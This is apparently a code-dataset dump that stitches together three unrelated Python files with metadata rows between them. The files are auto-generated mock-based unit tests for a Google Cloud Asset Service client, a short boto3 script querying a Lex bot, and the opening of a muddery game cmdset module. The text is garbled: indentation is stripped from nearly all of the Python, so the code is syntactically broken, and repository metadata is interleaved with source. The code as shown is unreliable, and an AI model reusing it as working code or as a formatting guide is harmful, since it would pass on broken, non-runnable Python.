RuntimeError,
)
async_pager = await client.search_all_iam_policies(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, assets.IamPolicySearchResult)
for i in responses)
@pytest.mark.asyncio
async def test_search_all_iam_policies_async_pages():
client = AssetServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.search_all_iam_policies(request={})).pages:
pages.append(page_)
        for page_, token in zip(pages, ['abc', 'def', 'ghi', '']):
assert page_.raw_page.next_page_token == token
def test_analyze_iam_policy(transport: str = 'grpc', request_type=asset_service.AnalyzeIamPolicyRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.AnalyzeIamPolicyResponse(
fully_explored=True,
)
response = client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.AnalyzeIamPolicyResponse)
assert response.fully_explored is True
def test_analyze_iam_policy_from_dict():
test_analyze_iam_policy(request_type=dict)
def test_analyze_iam_policy_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
client.analyze_iam_policy()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyRequest()
@pytest.mark.asyncio
async def test_analyze_iam_policy_async(transport: str = 'grpc_asyncio', request_type=asset_service.AnalyzeIamPolicyRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.AnalyzeIamPolicyResponse(
fully_explored=True,
))
response = await client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.AnalyzeIamPolicyResponse)
assert response.fully_explored is True
@pytest.mark.asyncio
async def test_analyze_iam_policy_async_from_dict():
await test_analyze_iam_policy_async(request_type=dict)
def test_analyze_iam_policy_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
call.return_value = asset_service.AnalyzeIamPolicyResponse()
client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_analyze_iam_policy_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.AnalyzeIamPolicyResponse())
await client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
def test_analyze_iam_policy_longrunning(transport: str = 'grpc', request_type=asset_service.AnalyzeIamPolicyLongrunningRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyLongrunningRequest()
# Establish that the response is the type that we expect.
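    # The long-running RPC returns an operation future rather than the raw
    # Operation proto.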
assert isinstance(response, future.Future)
def test_analyze_iam_policy_longrunning_from_dict():
test_analyze_iam_policy_longrunning(request_type=dict)
def test_analyze_iam_policy_longrunning_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
client.analyze_iam_policy_longrunning()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyLongrunningRequest()
@pytest.mark.asyncio
async def test_analyze_iam_policy_longrunning_async(transport: str = 'grpc_asyncio', request_type=asset_service.AnalyzeIamPolicyLongrunningRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyLongrunningRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_analyze_iam_policy_longrunning_async_from_dict():
await test_analyze_iam_policy_longrunning_async(request_type=dict)
def test_analyze_iam_policy_longrunning_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyLongrunningRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_analyze_iam_policy_longrunning_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyLongrunningRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AssetServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AssetServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = AssetServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.AssetServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.AssetServiceGrpcTransport,
transports.AssetServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.AssetServiceGrpcTransport,
)
def test_asset_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.AssetServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_asset_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.AssetServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'export_assets',
'list_assets',
'batch_get_assets_history',
'create_feed',
'get_feed',
'list_feeds',
'update_feed',
'delete_feed',
'search_all_resources',
'search_all_iam_policies',
'analyze_iam_policy',
'analyze_iam_policy_longrunning',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
@requires_google_auth_gte_1_25_0
def test_asset_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AssetServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_asset_service_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AssetServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
def test_asset_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AssetServiceTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_asset_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
AssetServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_asset_service_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
AssetServiceClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.AssetServiceGrpcTransport,
transports.AssetServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_asset_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.AssetServiceGrpcTransport,
transports.AssetServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_asset_service_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.AssetServiceGrpcTransport, grpc_helpers),
(transports.AssetServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
@requires_api_core_gte_1_26_0
def test_asset_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"cloudasset.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
scopes=["1", "2"],
default_host="cloudasset.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.AssetServiceGrpcTransport, grpc_helpers),
(transports.AssetServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
@requires_api_core_lt_1_26_0
def test_asset_service_transport_create_channel_old_api_core(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus")
create_channel.assert_called_with(
"cloudasset.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.AssetServiceGrpcTransport, grpc_helpers),
(transports.AssetServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
@requires_api_core_lt_1_26_0
def test_asset_service_transport_create_channel_user_scopes(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"cloudasset.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
scopes=["1", "2"],
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.AssetServiceGrpcTransport, transports.AssetServiceGrpcAsyncIOTransport])
def test_asset_service_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_asset_service_host_no_port():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='cloudasset.googleapis.com'),
)
assert client.transport._host == 'cloudasset.googleapis.com:443'
def test_asset_service_host_with_port():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='cloudasset.googleapis.com:8000'),
)
assert client.transport._host == 'cloudasset.googleapis.com:8000'
def test_asset_service_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.AssetServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_asset_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.AssetServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.AssetServiceGrpcTransport, transports.AssetServiceGrpcAsyncIOTransport])
def test_asset_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.AssetServiceGrpcTransport, transports.AssetServiceGrpcAsyncIOTransport])
def test_asset_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_asset_service_grpc_lro_client():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
transport = client.transport
    # Ensure that we have an api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_asset_service_grpc_lro_async_client():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc_asyncio',
)
transport = client.transport
    # Ensure that we have an api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsAsyncClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_asset_path():
expected = "*".format()
actual = AssetServiceClient.asset_path()
assert expected == actual
def test_parse_asset_path():
expected = {
}
path = AssetServiceClient.asset_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_asset_path(path)
assert expected == actual
def test_feed_path():
project = "squid"
feed = "clam"
expected = "projects/{project}/feeds/{feed}".format(project=project, feed=feed, )
actual = AssetServiceClient.feed_path(project, feed)
assert expected == actual
def test_parse_feed_path():
expected = {
"project": "whelk",
"feed": "octopus",
}
path = AssetServiceClient.feed_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_feed_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "oyster"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = AssetServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nudibranch",
}
path = AssetServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "cuttlefish"
expected = "folders/{folder}".format(folder=folder, )
actual = AssetServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "mussel",
}
path = AssetServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "winkle"
expected = "organizations/{organization}".format(organization=organization, )
actual = AssetServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nautilus",
}
path = AssetServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "scallop"
expected = "projects/{project}".format(project=project, )
actual = AssetServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "abalone",
}
path = AssetServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "squid"
location = "clam"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = AssetServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "whelk",
"location": "octopus",
}
path = AssetServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.AssetServiceTransport, '_prep_wrapped_messages') as prep:
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.AssetServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = AssetServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
f622e236dad0ae272bf7f9ba003242f9017f8e62 | faf512a387355c5a6e5af59fc48aa2a79762344c | /playground/bot_runner.py | 2dfbcdc23780892642059da3e9d5e2c61716e453 | [
"Apache-2.0"
] | permissive | lawrencechen0921/ExcelLexBot | f80f848058af284f8595206a9e510baf21d013b1 | 97041c47c06ba42cb10630d78b2300b113b6b3bf | refs/heads/master | 2021-07-09T10:58:51.155580 | 2019-10-28T08:15:15 | 2019-10-28T08:15:15 | 229,690,075 | 0 | 0 | Apache-2.0 | 2021-03-20T05:10:26 | 2019-12-23T06:23:00 | null | UTF-8 | Python | false | false | 271 | py | import boto3
import json
client = boto3.client('lex-runtime', region_name='us-east-1')
response = client.post_text(
botName='ScheduleAppointmentBot',
botAlias='$LATEST',
userId='UserOne',
inputText='book a hotel')
print(json.dumps(response, indent=4))
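
# A rough sketch of how the reply might be consumed; the field names below
# (intentName, dialogState, message) are assumed from the Lex runtime API and
# are not verified against this bot, so treat them as illustrative only:
#
#   intent = response.get('intentName')     # matched intent, e.g. 'BookHotel'
#   state = response.get('dialogState')     # e.g. 'ElicitSlot' or 'Fulfilled'
#   prompt = response.get('message')        # next prompt to show the user
#   print(intent, state, prompt)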
| [
"[email protected]"
] | |
28fb47d43c5f1a043a47867a3eea10ad3e89707d | 53cb38bba0f95ddbffd83a9e45c9eed602694265 | /muddery/commands/default_cmdsets.py | 9564a9cc053c9b9d55621a2346b48167a0c66bd4 | [
"BSD-3-Clause"
] | permissive | elove88/muddery | 4356eb0203edeb26285b2bf032f410a8e6e4fb3b | 55dabb2d8d5fbf87ef0e7f2a2a0722251510a254 | refs/heads/master | 2021-09-05T23:30:33.835858 | 2018-01-31T13:50:26 | 2018-01-31T13:50:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,733 | py | """
Command sets
All commands in the game must be grouped in a cmdset. A given command
can be part of any number of cmdsets and cmdsets can be added/removed
and merged onto entities at runtime.
To create new commands to populate the cmdset, see
`commands/command.py`.
"""
import traceback
from evennia import CmdSet
from evennia import default_cmds
from muddery.commands import combat
from muddery.commands import general
from muddery.commands import player
from muddery.commands import unloggedin
class CharacterCmdSet(default_cmds.CharacterCmdSet):
"""
The `CharacterCmdSet` contains general in-game commands like `look`,
`goto`, etc available on in-game Character objects. It is merged with
the `PlayerCmdSet` when a Player puppets a Character.
"""
key = "DefaultCharacter"
def at_cmdset_creation(self):
"""
Populates the cmdset
"""
super(CharacterCmdSet, self).at_cmdset_creation()
#
